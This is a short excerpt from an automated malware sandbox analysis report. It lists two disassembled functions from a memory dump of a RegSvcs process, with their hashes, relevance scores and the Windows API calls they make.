                                    • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                                    • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                    • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                                    Function 00440C91 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                                    • GetLastError.KERNEL32 ref: 00440D35
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide$ErrorLast
                                    • String ID:
                                    • API String ID: 1717984340-0
                                    • Opcode ID: a909a75f279edaa9992fcfd87f44a9f238bfc46e7277e37c8624290a99980dba
                                    • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
                                    • Opcode Fuzzy Hash: a909a75f279edaa9992fcfd87f44a9f238bfc46e7277e37c8624290a99980dba
                                    • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
                                    Function 00411B5F Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                    Download Yara Rule
                                    APIs
                                    • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411B8C
                                    • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C58
                                    • SetLastError.KERNEL32(0000007F), ref: 00411C7A
                                    • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastRead
                                    • String ID:
                                    • API String ID: 4100373531-0
                                    • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                    • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                                    • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                    • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99